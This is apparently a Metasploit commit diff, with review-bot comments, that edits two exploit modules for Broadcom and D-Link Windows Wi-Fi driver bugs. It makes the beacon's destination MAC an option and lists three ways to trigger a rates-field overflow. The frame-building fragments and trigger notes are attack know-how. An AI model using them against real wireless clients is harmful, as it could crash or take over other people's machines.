Better credit to Gil in the comments, made ADDR_DST do something
git-svn-id: file:///home/svn/framework3/trunk@4141 4d416f70-5f16-0410-b530-b9f4589650da
unstable
parent
2ce2ff8a3a
commit
5c0176e2dd
@ -153,7 +153,7 @@ class Exploits::Windows::Driver::Broadcom_WiFi_SSID < Msf::Exploit::Remote
|
|||
"\x80" + # type/subtype
|
||||
"\x00" + # flags
|
||||
"\x00\x00" + # duration
|
||||
"\xff\xff\xff\xff\xff\xff" + # dst
|
||||
eton(datastore['ADDR_DST']) + # dst
|
||||
"\x58\x58\x58\x58\x58\x58" + # src
|
||||
"\x58\x58\x58\x58\x58\x58" + # bssid
|
||||
"\x70\xed" + # sequence number
|
||||
|
|
|
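Review bot: The new `eton(datastore['ADDR_DST'])` on the dst line passes the option string straight through; unless `eton`, which is defined outside this hunk, validates its input, a mistyped or empty MAC would yield a short or wrong address field instead of an error, and nothing visible here checks that the option is set. A guard such as `raise ArgumentError, "ADDR_DST must be a MAC address" unless datastore['ADDR_DST'] =~ /\A([0-9a-f]{2}:){5}[0-9a-f]{2}\z/i` before the frame is assembled would make a bad value fail loudly. The src and bssid fields stay hard-coded to six 0x58 bytes, a fixed on-air fingerprint that the DLink module in this same commit avoids by using `src`/`bssid` variables. The frame-building expression starts and ends outside the hunk.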
@ -137,12 +137,15 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot
|
|||
end
|
||||
|
||||
|
||||
#
|
||||
# The following research was provided by Gil Dabah of ZERT
|
||||
#
|
||||
# The long rates field bug can be triggered three different ways (at least):
|
||||
# 1) Send a single rates IE with valid rates up front and long data
|
||||
# 2) Send a single rates IE field with valid rates, follow with IE type 0x32 with long data (thanks gil!)
|
||||
# 2) Send a single rates IE field with valid rates, follow with IE type 0x32 with long data
|
||||
# 3) Send two IE rates fields, with the second one containing the long data (this exploit)
|
||||
#
|
||||
|
||||
def create_beacon
|
||||
|
||||
ssid = Rex::Text.rand_text_alphanumeric(6)
|
||||
|
@ -158,9 +161,9 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot
|
|||
"\x80" + # type/subtype
|
||||
"\x00" + # flags
|
||||
"\x00\x00" + # duration
|
||||
"\xff\xff\xff\xff\xff\xff" + # dst
|
||||
eton(datastore['ADDR_DST']) + # dst
|
||||
src + # src
|
||||
bssid + # bssid
|
||||
bssid + # bssid
|
||||
seq + # seq
|
||||
Rex::Text.rand_text(8) + # timestamp value
|
||||
"\x64\x00" + # beacon interval
|
||||
|
|
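Review bot: The new `eton(datastore['ADDR_DST'])` line in the third hunk replaces the fixed broadcast address, but the `# dst` comment no longer tells the reader that this field is now operator-controlled or what that means for scope. A beacon sent to the broadcast address reaches every listening station in range, so a crash in a vulnerable driver would not be limited to the intended target, whereas a unicast ADDR_DST narrows it to one station. I would change the comment to `# dst (ADDR_DST option: broadcast hits every station in range, unicast targets one)`. The two adjacent `bssid + # bssid` lines read as identical, so that change is presumably whitespace-only; create_beacon's body continues past the hunk.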